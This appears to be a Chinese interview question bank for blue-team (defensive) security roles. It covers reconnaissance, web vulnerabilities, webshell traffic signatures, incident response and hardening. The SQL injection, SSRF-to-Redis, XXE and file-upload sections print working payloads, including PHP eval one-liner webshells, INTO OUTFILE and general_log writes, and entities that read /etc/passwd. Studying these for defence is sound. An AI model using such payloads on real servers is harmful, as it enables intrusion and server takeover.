2025护网蓝队面试题库，参加护网看这个就够了！-洪萨配资

三、信息收集篇

信息收集什么？

服务器：操作系统，IP，数据库类型
网站：CMS，Web容器，CDN，旁站，C段信息
域名：子域名，公司名称，注册人，社工信息
具体站点：目录扫描，端口扫描，漏洞扫面

判断目标操作系统的方法

大小写（Win大小写不敏感，Linux敏感）
ping命令：TTL值在默认情况下win是128，Linux是64.
nmap -O IP值：可以查出

怎么修改TTL值？

在安全加固中，需修改TTL。

怎么验证是否绕过CDN

使用多地ping的服务，查看对应IP地址是否唯一，如果不唯一大概率就是存在CDN
使用nslookup命令检测，查看返回域名解析对应IP地址是否唯一，如果不唯一很可能存在CDN
工具：
站长工具：http://ping.chinaz.com/
爱战网：https://ping.aizhan.com/
国外ping探测：https://asm.ca.com/en/ping.php

如何验证找到的IP为真实IP

直接访问IP，看看响应页面是否和访问的域名一样。

探查网站的CMS有什么意义？

查找已曝光的漏洞。
如果开源，还能下载相应的源码进行代码审计。
根据CMS特征关联同CMS框架站点，进行敏感备份文件扫描，有可能获得站点备份文件。

旁站信息收集的意义和方法。

旁站就是与目标网站处于同一服务器的不同网站，在目标网站无法攻陷的情况下，渗透旁站，拿到该服务器的最高权限就可将目标网站拿下。方法
站长工具输入IP值
bing搜索引擎查询（语法：ip:xxx.xxx.xxx.xxx）
使用fofa（语法：ip=“xxx.xxx.xxx.xxx”）

C段主机信息收集的意义与方法

nmap扫描C段主机：nmap -sn ip/24
搜索引擎：site:xxx.xxx.xxx.*
webfinder
fofa: ip=“xxx.xxx.xxx.0/24”

子域名信息收集的意义与方法

原理与旁站，C段类似，主站攻不下，去搜索其子域名，可能防御没那么厉害。

枚举
搜索引擎
fofa
透明证书:https://crt.sh/
聚合工具：oneforall

端口信息收集的方法与常见的端口

Nmap:namp -sv -p 1-65535 ip值
御剑
Masscan
zmap 常见端口 FTP 20 FTP服务器真正传输所用的端口，用于上传、下载 FTP 21 用于FTP的登陆认证 SSH、SFTP 22 加密的远程登录，文件传输 Telnet 23 远程登录（在本地主机上使用此端口与远程服务器的22/3389端口连接） SMTP 25 用于发送邮件 DNS 53 域名解析 HTTP 80 用于网页浏览 MySQL 3306 数据库 HTTPS 443 加密的网页浏览端口 TOMCAT 8080 WWW代理开放此端口 redis 6379 远程桌面连接 3389 SQLserver 1433

数据包有哪些请求方式

常用八种请求方式，分别是 GET、POST、HEAD、PUT、DELETE、OPTIONS、TRACE、 CONNECT，get 和 post 最常用

get请求与post请求的区别

数据传输位置：get在URL,POST不在url
数据长度：get有上限，post无上限
安全性：get有风险，post相对更安全
语义：get请求通常用于获取或检索资源，不对服务器产生影响 post请求用于提交数据给服务器，会对服务器数据库产生影响

四、漏洞篇

OWASP top10

1.失效的访问控制
2.加密机制失效
3.注入（包括跨站脚本攻击XSS和SQL注入等）
4.不安全设计
5.安全配置错误
6.自带缺陷和过时的组件
7.身份识别和身份验证错误
8.软件和数据完整性故障
9.安全日志和监控故障
10.服务端请求伪造SSRF

五、SQL注入篇

SQL注入的原理以及发生前提

SQL注入原理：在数据交互中，前端的数据传入到后台进行处理时，没有做严格的判断，过滤。导致传入的“数据”拼接到SQL语句中后，被当作SQL语句的一部分执行。从而导致数据库受损（被脱裤、数据被删除、甚至整个服务器权限沦陷）
漏洞产生原因（实现条件）：用户对sql查询语句参数可控原本程序要执行的SQL语句,拼接了用户输入的恶意数据

SQL注入的类型

1.联合注入 2.堆叠注入 3.宽字节注入 4.cookie注入 5.XFF头注入 6.UA注入（user-agent注入） 7.Referer注入 8.二次注入 9.base64注入 10.万能密码 1.文件读写盲注类型： 1.基于时间的盲注 sleep() benchmark() 2.基于布尔的注入 3.基于报错的注入 updatexml() extractvalue() floor() exp()

防御SQL注入

使用参数化查询或预编译语句：

使用参数化查询（也称为绑定参数或预编译语句）。参数化查询使用占位符（例如问号或冒号）来表示查询中的变量，然后通过参数绑定的方式将用户提供的数据与查询语句分开。这样可以防止用户输入被错误地解释为SQL代码。

输入验证和过滤：

过滤可以去除或转义输入中的特殊字符，以防止它们被错误地解释为SQL代码。可以使用正则表达式或内置的验证函数来验证输入数据，并使用转义函数或安全的编码机制来过滤特殊字符。

最小权限原则：

为应用程序连接数据库的账户分配最低限度的权限，只提供执行必要操作的权限。

不信任外部数据：

对于从外部来源获取的数据（例如用户输入、API调用等），应该始终将其视为不可信任的，并进行适当的验证和处理。不要直接将外部数据拼接到SQL查询中，而是使用参数化查询或预编译语句。

使用安全的编程实践：

遵循安全的编程实践，如不在应用程序中直接拼接SQL查询、避免动态拼接查询字符串、避免使用可执行字符串的函数等。

SQL注入的WAF绕过方法

1.大小写绕过注入
2.双写绕过注入
3.编码绕过注入
4.内联注释绕过注入

SQL注入的危害

1.获取数据库数据数据库中存放的用户的隐私信息的泄露，脱取数据库中的数据内容（脱库），可获取网站管理员帐号、密码悄无声息的进行对网站后台操作等。
2.网页篡改通过操作数据库对特定网页进行篡改，严重影响正常业务进行与受害者信誉。
3.网页挂马将恶意文件或者木马下载链接写入数据库，修改数据库字段值，进行挂马攻击。
4.篡改数据库数据攻击数据库服务器，篡改或者添加普通用户或者管理员帐号。
5.获取服务器权限列取目录、读取、写入shell文件获取webshell，远程控制服务器，安装后门，经由数据库服务器提供的操作系统支持，让攻击者得以修改或控制操作系统。

宽字节注入原理

由于PHP utf-8编码数据库GBK编码，PHP发送请求到 mysql 时经过一次gbk编码，因为GBK是双字节编码，所以我们提交的%df这个字符和转译的反斜杠组成了新的汉字，然后数据库处理的时候是根据GBK去处理的，然后单引号就逃逸了出来。

SQL注入如何写入webshell

条件：

1、知道web绝对路径

2、有文件写入权限(一般情况只有ROOT用户有)

3、数据库开启了secure_file_priv设置

然后就能用select into outfile写入webshell

查看secure_file_priv的状态，命令：show VARIABLES like ‘%secure%’ 查看是否有文件读取权限。
查看当前用户是否有File权限
当secure_file_priv文件导出路径与web目录路径重叠，写入Webshell才可以被访问到。
知道网站目录的绝对路径union select写入

union select '<?php eval($_POST[cmd])?>' into outfile 'web目录';

分隔符写入当union无法使用时，还可以利用分隔符写入：

?id=1 INTO OUTFILE '物理路径' lines terminated by （<?php eval($_POST[cmd])?>）# ?id=1 INTO OUTFILE '物理路径' fields terminated by （<?php eval($_POST[cmd])?>）# ?id=1 INTO OUTFILE '物理路径' columns terminated by （<?php eval($_POST[cmd])?>）# ?id=1 INTO OUTFILE '物理路径' lines starting by （<?php eval($_POST[cmd])?>）#

log**写入** 新版本的mysql在my.ini中设置了导出文件的路径，无法再使用select into outfile来写入一句话木马，这时我们可以通过修改MySQL的log文件来获取webshell。

show variables like '%general%'; #查看配置 set global general_log = on; #开启general log模式 set global general_log_file = '网站目录/shell.php'; #设置日志目录为shell地址 select '<?php eval($_POST[shell]);?>' #写入shell set global general_log=off; #关闭general log模式

然后就可以在网站目录下创建一个shell.php，里边有我们写入的一句话木马

打开执行phpinfo

六、XSS篇

xss的原理和类型

原理：XSS，即跨站脚本攻击，是指攻击者利用Web服务器中的代码漏洞，在页面中嵌入客户端脚本（通常是一段由JavaScript编写的恶意代码），当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面，用户浏览器会自动加载并执行该恶意代码，从而达到攻击的目的。

XSS的危害与防御

危害：窃取受害者的敏感信息、绕过访问控制、利用受害者的身份进行攻击、篡改网页内容、发起钓鱼攻击等等。窃取cookie，抓取屏幕截图获取键盘记录，重定向，植入广告，恶意链接网页钓鱼，网页挂马，结合网页挂马或者其他工具(Metasploit)获取服务器或者操作系统权限。
防御：对用户输入进行严格的过滤和验证、采用安全的编程语言和框架、使用安全的API和库函数、使用HTTP-only Cookie、限制用户输入等等。此外，还可以使用一些安全工具和技术来检测和防御XSS漏洞，例如：Web应用程序防火墙（WAF）、安全编码规范和审计、反射性XSS漏洞检测等等。

七、CSRF漏洞

CSRF漏洞原理

CSRF(Cross -Site Request Forgery ),跨站请求伪造攻击，通常缩写为CSRF或者XSRF , 是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS)，但它与XSS非常不同，XSS利用站点内的信任用户，而CSRF则通过伪装成受信任用户请求受信任的网站

CSRF漏洞分类

GET型
POST型

CSRF漏洞的危害

盗取用户敏感信息，如登录信息、支付信息等。
非法修改用户数据，如发表恶意言论、篡改个人资料等。
执行任意操作，如利用受害者账号进行网络攻击等

CSRF漏洞的防御

使用CSRF Token机制，将随机生成的Token与表单、链接等操作绑定，使攻击者无法伪造请求。
增加足够的身份验证机制，如密码、短信验证等，减少攻击者利用受害者身份的可能性。
使用HTTP Referer验证，判断请求来源是否合法。
避免使用GET方式提交表单，减少攻击者通过获取URL进行攻击的可能性。
对敏感操作进行二次确认，提示用户确认操作行为。

八、SSRF漏洞

SSRF漏洞原理

SSRF，服务器端请求伪造)是一种由攻击者构造形成由服务器发起请求的一个安全漏洞.(注意是服务器发起请求)
攻击场景：当攻击者想要访问服务器B上的服务，但是由于存在防火墙或者服务器B是属于内网主机等原因导致攻击者无法直接访问。如果服务器A存在SSRF漏洞，这时攻击者可以借助服务器A来发起SSRF攻击，通过服务器A向主机B发起请求，达到攻击内网的目的。

SSRF怎么结合Redis相关漏洞利用？

主要通过两种协议，dict协议和gopher协议。

dict协议利用redis相关漏洞：

探测**端口：**ssrf.php?**url=dict://x.x.x.x: 端口端口端口利用burpsuite爆破端口**探测是否设置弱口令：ssrf.php?url=dict://x.x.x.x:6379/info 已知端口利用info探测是否设置了密码爆破密码：ssrf.php?url=dict://x.x.x.x:6379/auth: 密码密码密码利用burpsuite爆破密码写入webshell：

1. url=dict://xxx.xxx:6379/config:set:dir:/var/www/html 切换文件目录 2. url=dict://xxx.xxx:6379/config:set:dbfilename:webshell.php 设置保存文件名 3. url=dict://xxx.xxx:6379/set:webshell:"\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e" //利用dict协议写入webshell 以上的字符编码是<?php phpinfo();?>的十六进制 4. url=dict://x.x.x.x:6379/save 保存 1. url=dict://xxx.xxx:6379/config:set:dir:/var/www/html 切换文件目录 2. url=dict://xxx.xxx:6379/config:set:dbfilename:webshell.php 设置保存文件名 3. url=dict://xxx.xxx:6379/set:webshell:"\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e"

//利用dict协议写入webshell 以上的**字符编码是的十六进制** 4.ssrf.php?url=dict://x.x.x.x:6379/save 保存 dict协议利用计划任务反弹shell或者写入ssh公钥的手段类似

gopher**协议利用redis未授权访问漏洞写入webshell：** 常规利用步骤： set x “\n\n\n<?php @eval($\\\_POST\['redis'\]);?>\n\n\n” config set dir /var/www/html config set dbfilename shell.php save 两次url编码后构造url：

//第一次url解码和第二次url解码 //同理其他类似计划任务反弹和写入ssh公钥等getshell方式相似

SSRF漏洞经常存在的位置？

分享：通过URL地址分享网页内容
转码服务
在线翻译
图片加载与下载：通过URL地址加载或下载图片
图片、文章收藏功能
未公开的api实现以及其他调用URL的功能

SSRF漏洞的危害

攻击者可以在服务器端内部网络中进行扫描和攻击。
向内部任意主机的任意端口发送payload来攻击内网服务
攻击内网的web应用，如直接SQL注入、XSS攻击等
攻击者可以通过向本地端口发送请求来绕过防火墙等网络安全设备。
攻击者可以利用SSRF漏洞进行钓鱼攻击、内网渗透等攻击。
DOS攻击（请求大文件，始终保持连接Keep-Alive Always）
利用file、gopher、dict协议读取本地文件、执行命令等
可以无视网站CDN

SSRF漏洞防御

禁止跳转
过滤返回的信息
如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。
统一错误信息：避免用户可以根据错误信息来判断远程服务器的端口状态。
限制请求的端口：比如80,443,8080,8090。
禁止除HTTP和HTTPS外的协议：比如说仅仅允许http和https请求。可以防止类似于file:///,gopher://,ftp://请求等引起的问题。
对请求地址设置白名单或者限制内网IP

九、XXE

XXE漏洞的原理及危害

如果Web应用的脚本代码没有限制XML引入外部实体，从而导致用户可以插入一个外部实体，并且其中的内容会被服务器端执行，插入的代码可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。

如何构建XXE攻击？

（1）直接通过DTD外部实体声明

<!DOCTYPE a [ <!ENTITY a SYSTEM "file:///etc/passwd"> ]>

（2）通过DTD文档引入外部DTD文档，再引入外部实体声明

<! DOCTYPE a SYSTEM "http:/test.com/abc.dtd">

dtd文档内容：<!ENTITY b SYSTEM "file:///etc/passwd" >

（3）通过DTD文档引入外部实体声明

<!DOCTYPE a [ <!ENTITY % d SYSTEM "http:/test.com/abc.dtd"> %d; ]>

dtd文档内容：<!ENTITY b SYSTEM "file:///etc/passwd" >

XXE漏洞的防御

禁用外部实体的引入，比如：使用libxmldisableentity_loader（true）等方式。
过滤如SYSTEM等敏感关键字，防止非正常、攻击性的外部实体引入操作。

十、文件上传漏洞

文件上传漏洞的原理

文件上传漏洞是指用户上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务器端命令的能力。

<?php @eval($_POST['666']);?>

文件上传漏洞的危害

上传webshell,控制服务器、远程命令执行
上传系统病毒、木马文件进行挖矿、僵尸网络
进行提权操作
修改web页面，实现钓鱼、挂马等操作。
进行内网渗透。

文件上传功能的监测点有哪些？

客户端的JS检测（主要检测文件名后缀）
服务端检测（MINE类型检测、文件后缀名、文件格式头）

文件上传漏洞常见上传点

图片上传：png,jpg.
文件上传:php
头像上传:
Flash上传:上传文件名:击者可以通过构造含有特殊字符的文件名来绕过服务器的检查，以实现攻击的目的

十一、文件包含漏洞

文件包含漏洞原理

服务器在解析动态页面时，将用户提交的输入作为参数传递给后台处理程序，如果没有对用户输入进行充分的过滤和验证，攻击者可以通过构造特殊的输入，让服务器包含恶意文件或者代码，进而实现攻击目的。

文件包含函数

PHP：Include()、Require()、Include_once()、Require_once()

十二、RCE远程代码执行

RCE漏洞原理

简称RCE，指攻击者能够在远程系统上执行恶意代码的一种攻击方式。攻击者通常利用漏洞，将恶意代码注入到受攻击的应用程序或操作系统中，从而实现在远程系统上执行任意代码的目的.——能执行任意代码导致它的危害非常高。注意：RCE不同于其他漏洞，它更多的表示一种结果，其他漏洞导致了RCE的结果。

常见编程语言执行函数

在编程语言中，有一些执行函数可能会带来安全风险，因为它们允许执行动态代码或系统命令。以下是一些常见编程语言中的执行函数和对应的语言名称： Python: eval(): Python的内置函数，用于执行字符串中的Python代码。 exec(): Python的内置函数，用于执行包含Python代码的字符串或代码对象。

JavaScript: eval(): JavaScript的全局函数，用于执行包含JavaScript代码的字符串。

PHP: shell_exec() eval(): PHP的函数，用于执行包含PHP代码的字符串。 exec(): PHP的函数，用于执行系统命令。

Java: Runtime.exec(): Java的类方法，用于执行系统命令。 ProcessBuilder: Java的类，用于创建进程并执行系统命令。

C#: Process.Start(): C#的方法，用于执行系统命令。 System.Diagnostics.Process: C#的类，用于创建进程并执行系统命令。

Ruby: eval(): Ruby的方法，用于执行包含Ruby代码的字符串。 system(): Ruby的方法，用于执行系统命令。

Go: os/exec 包: Go的标准库中的包，用于执行系统命令。

Shell 脚本: eval: 用于执行包含 Shell 脚本代码的字符串。 $(): 用于执行命令并返回输出。这些函数和方法在正确使用的情况下是有用的，但在接受用户输入或不充分验证的情况下，它们可能导致安全漏洞。因此，在编写代码时，务必小心使用这些执行函数，并始终对用户输入进行充分验证和过滤，以防止潜在的安全风险。

十三、流量分析篇

CS是什么东西，知道怎么使用吗？

简介
CobaltStrike是一款渗透测试工具，被业界人称为CS。CobaltStrike分为客户端与服务端，服务端是一个，客户端可以有多个，可用于团队分布式协同操作。
功能
CobaltStrike 集成了端口转发，服务扫描，自动化溢出，多模式端口监听， windows exe 木马生成，windows dll 木马生成，java 木马生成，office 宏病毒生成，木马捆绑。钓鱼攻击等功能。
使用
一般使用步骤就是，先启动服务端，然后启动客户端连接获得一个可视化的界面，新建监听器来接收会话，生成木马文件(常见.exe可执行文件，office宏病毒，html应用程序类型的后门文件)，上传到受害者主机，当受害者运行该木马文件时目标主机就在CS上线了。对比正常的http流量，CS的http通信流量具有以下几个特征：A. 心跳包特征

a) 间隔一定时间，均有通信，且流级上的上下行数据长度固定；

B. 域名/IP特征

a) 未走CDN、域前置的，域名及IP暴露

b) 走CDN、域前置的，真实IP会被隐藏；

C. 指令特征

a) 下发指令时，通过心跳包接收指令，这时， server 端返回的包更长，甚至包含要加载的dll模块数据。

b) 指令执行完后，client端通过POST请求发送执行的结果数据，body部分通过加密和base64编码。

c) 不同指令，执行的时间间隔不一样，可以通过POST请求和GET请求的间隔进行判断。

D. 数据特征

a) 在请求的返回包中，通信数据均隐藏在jqeury*.js中。

常见的webshell连接工具流量？

中国菜刀

连接过程中使用base64编码对发送的指令进行加密，其中两个关键payload z1 和 z2，名字都是可变的。

然后还有一段以QG开头，7J结尾的固定代码。

蚁剑

默认的user-agent请求头是antsword xxx，不过可以修改。

一般将payload进行分段，然后分别进行base64编码，一般具有像eval这样的关键字，然后呢大概率还有@ini_set(“display”,“0”);这段代码。

冰蝎

php代码中可能存在eval，assert等关键词，jsp代码中可能会有getclass()，getclassLoader()等字符特征。

冰蝎2.0

第一阶段请求中返回包的状态码是200，返回内容是16位的密钥。建立连接后的cookie格式都是Cookie：PHPSessid=xxxx ；path=/；特征。

冰蝎3.0

请求包中的conten-length字段是5740或者5720，然后请求头也具有特征信息，不过这个比较长，没有记住。

哥斯拉

1.jsp代码中可能会具有getclass，getclassLoader等关键字，payload使用base64编码等特征。php和asp则是普通的一句话木马。

2.在响应包的cache-control字段中有no-store，no-cache等特征。

3.所有请求中的cookie字段最后面都存在；特征。

webshell防御

1.建议用户通过ftp来上传、维护网页，尽量不安装asp的上传程序。

2.对asp上传程序的调用一定要进行身份认证，并只允许信任的人使用上传程序。

3.asp程序管理员的用户名和密码要有一定复杂性，不能过于简单，还要注意定期更换。

4.到正规网站下载程序，下载后要对数据库名称和存放路径进行修改，数据库名称要有一定复杂性。

5.要尽量保持程序是最新版本。

6.不要在网页上加注后台管理程序登陆页面的链接。

7.为防止程序有未知漏洞，可以在维护后删除后台管理程序的登陆页面，下次维护时再通过上传即可。

8.要时常备份数据库等重要文件。

9.日常要多维护，并注意空间中是否有来历不明的asp文件。

10.尽量关闭网站搜索功能，利用外部搜索工具，以防爆出数据。

11.利用白名单上传文件，不在白名单内的一律禁止上传，上传目录权限遵循最小权限原则。

对数据包或日志的分析思路？

用流量监测的安全设备，比如天眼，查看报文，分析报文里和 host 和网站目录路径，查看是否可疑，使用微步查询 host 是否为恶意，使用 wireshark 对数据包深度分析看一下请求的网站路径，源 IP 与目的 ip 地址，host 字段的值以及发包内容等。工具有 wearshark，网站的话微步在线。

如何区分扫描流量和手动流量？

扫描流量和手动流量的区别在于其产生的方式和行为特征，因此可以通过以下几种方法来查看区分它们：

查看流量来源：扫描流量通常是由自动化工具或蠕虫病毒等程序生成的，因此其源 IP或者发起请求的主机通常不固定，而手动流量则来自人工操作的设备，其请求的 IP 地址和用户代理信息都会有所不同。
检测流量频率和规律：扫描流量通常会呈现出周期性、规律性的访问行为，例如连续大量的 TCP SYN请求等。而手动流量则通常难以呈现出明显的规律和周期性。
观察流量的请求路径和参数：扫描流量通常是为了探测系统漏洞和弱点而产生的，它们通常会对一些已知的 URL和参数进行大量的尝试，并使用一些特殊的 HTTP 头部信息。而手动流量则更加多样化，可能会包含更丰富的请求路径和参数。
分析流量的响应状态码和长度：扫描流量通常会通过检测返回的状态码和页面长度等信息来判断目标是否存在漏洞或弱点。手动流量则通常会具有更加正常的响应状态码和页面长度。

总之，通过综合分析流量来源、访问规律、请求路径和参数以及响应状态码等特征，我们可以比较准确地区分扫描流量和手动流量，并采取相应的防御措施。

日志与流量分析？

日志和流量分析是网络安全领域中常用的两种技术。它们都可以帮助安全人员更好地了解系统的状态，检测和预防威胁。

日志分析是指对服务器、应用程序等产生的日志进行收集、存储、分析和处理，以便了解系统的运行状况和发现异常事件。通过对日志数据的统计和分析，可以追踪用户活动、系统错误、安全事件等，以及发现潜在的风险和漏洞。比如，通过分析登录日志可以检测到恶意登录尝试；通过分析访问日志可以了解网站的被攻击情况。

流量分析是指对网络流量进行收集、存储、分析和处理，以便了解网络连接的状态，检测和预防网络攻击。通过对流量数据的统计和分析，可以追踪网络通信、检测威胁和漏洞，比如检测恶意流量、DDoS攻击等。流量分析通常需要使用专业的工具和技术，包括网络协议分析、流量捕获和分析软件等。

综上所述，日志和流量分析是网络安全中非常重要的技术，它们可以帮助安全人员发现和解决潜在的安全问题，并维护系统和网络的正常运行。

十四、权限维持和应急响应篇

怎么建立隐藏用户？

研判的思路？

1.首先对攻击的来源进行判断，是内对内，外对内还是内对外的情况。
2.依据设备的告警信息结合具体情况来分析攻击行为的类型，比如说告警SQL注入攻击，那我们就去查看一下请求数据包里面是否有单引号，SELECT等敏感字符，返回数据包里面是否有SQL语法报错等信息，有的话就可以初步判断该攻击行为是SQL注入攻击。
3.然后就是根据攻击特征来分析攻击行为使用了什么技术或者说工具，比如说攻击的频率，数据包的信息等等。比如说在使用AWVS或者APPSCAN等工具在扫描的时候，很有可能在请求数据包的user-agent里面就有相关的信息。同样结合告警信息和具体情况来判断攻击行为的危害程度，比如说检测到多条攻击成功告警和内对内及内对外攻击告警，这个时候就需要尽快的交给应急组了。
4.结合设备告警信息及具体情况分析攻击意图，比如说攻击者的目标是主站还是旁站，是主机还是域控，不同的攻击意图对于后续的处理也不同。
5.最后根据我们掌握的信息采取相应的处置方式，比如说告警信息是误报，说明设备需要策略优化，不需要处置。告警信息是尝试攻击，暂时对资产没有影响，就需要后续持续关注，攻击成功时能够做到及时上报。如果告警确认不是误报，并且攻击成功时，我们就需要迅速上报及时采取应急响应。

应急响应的思路？

简单版： Linux 入侵排查思路; 1账号安全,2历史命令,3检查异常端口,4检查异常进程,5检查开机启动项,6检查定时任务,7检查服务,8检查异常文件,9检查系统日志。 1 检查系统账号安全2.检查异常端口、进程3.检查启动项、计划任务、服务 4.日志分析（1. 日志中搜索关键字:如:union,select等 2. 分析状态码:

1xx information 200 successful 300 redirection 4xx client error 5xx server error 查找可疑文件,webshell 分析文件修改日期系统日志分析）

收集信息：收集客户信息和中毒主机信息，包括样本
判断类型：判断是否是安全事件，何种安全事件，勒索、挖矿、断网、DoS 等等
抑制范围：隔离使受害⾯不继续扩⼤
深入分析：日志分析、进程分析、启动项分析、样本分析方便后期溯源
清理处置：杀掉进程，删除文件，打补丁，删除异常系统服务，清除后门账号防止事件扩大，处理完毕后恢复生产
产出报告：整理并输出完整的安全事件报告

windows应急响应时排查分析的相关细节？

答：

可疑账号排查 lusrmgr.msc

1.检查服务器是否有弱口令。比如空口令或者密码复杂度不够。

2.高危端口是否对外开放，比如SSH服务22端口，RDP服务3389端口等。

3.查看服务器是否有可疑账号。

手工方面：lusrmgr.msc命令查看用户和组，查看是否有新增账号，隐藏账号，克隆账号。工具方面：比如利用D盾等工具来检测隐藏账号。 4.结合日志分析 eventvwr.msc 查看管理员登录时间，相关事件是否有异常。

敏感事件ID：

4624 登录成功 4625 登录失败 4672 使用超级管理员进行登录 4720 创建用户 5.使用query user查看当前系统的会话，比如查看是否有人使用远程登录服务器。

可疑进程和服务排查 taskmgr services.msc

1.查看CPU，内存，网络等资源是否有可疑状况。比如CPU占用率过高可能是中了挖矿病毒，磁盘空间大量占用可能是脚本或病毒大量生成和复制隐藏文件。

2.检查进程名

某些进程名是大量随机的情况，比如hrlC3.tmp、hrlD5.tmp、hrl6.tmp、hrlEE.tmp等多个名字相似的进程，基本上可以断定是异常进程。异常进程名伪装成系统进程或者说常见服务的进程名，此时可以通过进程描述来判断，并且需要手工对比。 3.检查进程和服务描述，修改时间或者数字签名是否有异常。

4.利用工具进行检测，比如Process Hunter或者火绒剑等专门针对进程服务信息的排查分析工具，主要查看的是公司名，描述，安全状态和启动类型等方面来排查。

可疑启动项排查 msconfig

msconfig或者任务管理器中的启动项查看名称，发布者和启动影响，以及右键查看属性来看数字签名和修改时间。
结合工具进行排查，比如火绒剑等工具，会将启动项分类为登录，驱动程序，计划任务，映像劫持等，利用分析排查

可疑文件排查

1.各个磁盘的Temp/tmp目录中是Windows产生的临时文件，查看有无异常文件。

2.Recent目录会记录最近打开的文档以及程序的相关记录。

3.查看文件的创建时间，修改时间和访问时间，比如说攻击者利用菜刀等工具对文件进行修改会改变修改时间，如果修改时间在创建时间之前，那就是很明显的可疑文件。

4.windows系统我的电脑快速访问，可以看到最近使用的文件，比如说图片或者压缩包等文件的使用历史和文件路径都会显示。

恶意样本排查

1.恶意样本指的一般是webshell，病毒，木马或者后门程序或文件，可以根据设备的告警信息来查找相关路径，再排查相关的进程和启动项。

常见的应急响应事件分类：

web入侵：网页挂马、主页篡改、Webshell
系统入侵：病毒木马、勒索软件、远控后门
网络攻击：DDOS攻击、DNS劫持、ARP欺骗

Windows应急响应常用命令？

查看账户：net user
查看隐藏账户：lusrmgr.msc
在Domains\Account\Users\Names下可以看到隐藏用户
登录时间查看：eventvwr.msc
查看Windows日志：链接: link
查看端口情况：netstat -ano
查看进程情况：tasklist|findstr “进程号”
杀死进程：taskkill /f /t /im httpd.exe
查看软件环境：msinfo32
查看启动项：【开始】——【所有程序】——【启动】、msconfig、

查看计划任务
查看服务：services.msc
组策略：gpedit.msc
查找最近打开文件：%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\
搜索恶意内容文件：findstr /m/i/s “eval” *.php、或者用everything、filelocator.
查找最新修改文件：使用everything 。everything—修改时间
查看系统版本以及补丁信息:

无法连接3389的情况？

f.管理员设置了权限，指定用户才能通过3389端口进行远程桌面访问

windowst入侵排查思路

1.检查系统账号安全

查看服务器是否有弱口令，远程管理端口是否对公网开放（使用netstat -ano命令、或者问服 务器管理员） lusrmgr.msc命令查看服务器是否存在可疑账号、新增账号，如有管理员群组的 （Administrators）里的新增账户，如有，请立即禁用或删除掉 用 D 盾或者注册表中查看服务器是否存在隐藏账号、克隆账号 结合日志，查看管理员登录时间、用户名是否存在异常 检查方法：Win+R 打开运行，输入“eventvwr.msc”，回车运行，打开“事件查看器”， 导出 Windows 日志–安全，利用 Log Parser 进行分析

2.检查异常端口、进程

netstat -ano检查端口连接情况，是否有远程连接、可疑连接 任务管理器-进程

3.检查启动项、计划任务、服务

4.检查系统相关信息

查看系统版本以及补丁信息 查找可疑目录及文件

5.日志分析

如何查看系统内存shell？

先判断是通过什么方法注入的内存马，可以先查看 web 日志是否有可疑的 web 访问日志，如果是 filter 或者 listener 类型就会有大量 url 请求路径相同参数不同的，或者页面不存在但是返回 200 的，查看是否有类似哥斯拉、冰蝎相同的 url 请求，哥斯拉和冰蝎的内存马注入流量特征与普通 webshell 的流量特征基本吻合。通过查找返回 200 的 url 路径对比 web目录下是否真实存在文件，如不存在大概率为内存马。如在 web 日志中并未发现异常，可以排查是否为中间件漏洞导致代码执行注入内存马，排查中间件的 error.log 日志查看是否有可疑的报错，根据注入时间和方法根据业务使用的组件排查是否可能存在 java 代码执行漏洞以及是否存在过 webshell，排查框架漏洞，反序列化漏洞。

详细：链接: link

linux登录日志查看文件？

linux 日志文件说明日志默认存放位置：/var/log/ 查看可登录的账户 cat/etc/passwd|grep ‘/bin/bash’ 查看所有用户最后的登录信息 lastlog 查看用户最近登录信息 last 其中，/var/log/wtmp 存储登录成功的信息、btmp 存储登录失败的信息、utmp 存储当前正在登录的信息查看当前用户登录系统情况 who

/var/log/message 系统启动后的信息和错误日志，是 Red Hat Linux 中最常用的日志之一

/var/log/secure 与安全相关的日志信息

/var/log/maillog 与邮件相关的日志信息

/var/log/cron 与定时任务相关的日志信息

/var/log/spooler 与 UUCP 和 news 设备相关的日志信息

/var/log/boot.log 守护进程启动和停止相关的日志消息

/var/log/wtmp 该日志文件永久记录每个用户登录、注销及系统的启动、停机的事件

普通的加固手段？

普通的加固手段包括以下几种：

更新补丁：定期更新操作系统、应用程序的补丁，修复已知的漏洞和安全问题。
强化口令策略：采用复杂、难以猜测的密码，并进行定期更换。同时可以启用账户锁定、多次失败尝试限制等功能，提高口令安全性。
加强身份验证：采用多因素身份验证技术，例如使用硬件令牌、生物特征等方式，确保只有授权用户才能访问系统。
安装防病毒软件：安装并及时更新防病毒软件，定期进行全盘扫描和实时监控，以便及时发现和处置潜在的恶意软件。
关闭不必要服务：关闭系统中不必要的服务和端口，降低攻击面，避免被利用。
限制访问权限：根据业务需要，设置合理的访问权限，对于未授权的用户或者设备进行限制，提高系统的安全性。
数据备份与恢复：定期备份重要数据，并将其存储在安全可靠的位置。在出现故障或事件时，能够快速恢复数据，避免数据丢失和系统停机。

总之，以上这些普通的加固手段可以帮助提高系统的安全性和稳定性，并且也是网络安全基础建设的关键步骤。在实际操作中，需要根据具体情况和需求，结合其他安全措施来进行综合加固。同时需要注意及时更新和检查，以确保系统始终处于安全状态。

了解过系统加固吗？

账户安全
windows
比如设置登录时不显示上次登录的用户名，防止弱口令爆破。
设置账户锁定策略，比如说登录行为限制次数，达到次数后锁定多长时间。
linux
禁用root之外的超级用户使用password -l <用户名>命令来锁定用户 -u解锁
限制普通用户使用sudo提权，或者说限制提权的权限大小
锁定系统中多余的自建账号
设置账户锁定登录失败锁定次数，锁定时间 faillog -u <用户名>命令来解锁用户
口令安全
windows
设置密码必须符合复杂性要求，比如设置时数字，大写字母，小写字母，特殊字符都要具备
设置最小密码长度不能为0，设置不能使用历史密码
linux
检查shadow中空口令账号，修改口令复杂度，设置密码有效期vim /etc/login.def命令
服务与端口收敛
关闭或者限制常见的高危端口，比如说22端口(SSH)，23端口(Telnet)，3389端口(RDP)
compmgmt.msc排查计划任务
linux上iptables封禁IP或者限制端口
文件权限管理
linux上chmod修改文件权限 chattr重要文件设置不可修改权限
系统日志审计
linux上设置系统日志策略配置文件
系统日志 /var/log/message
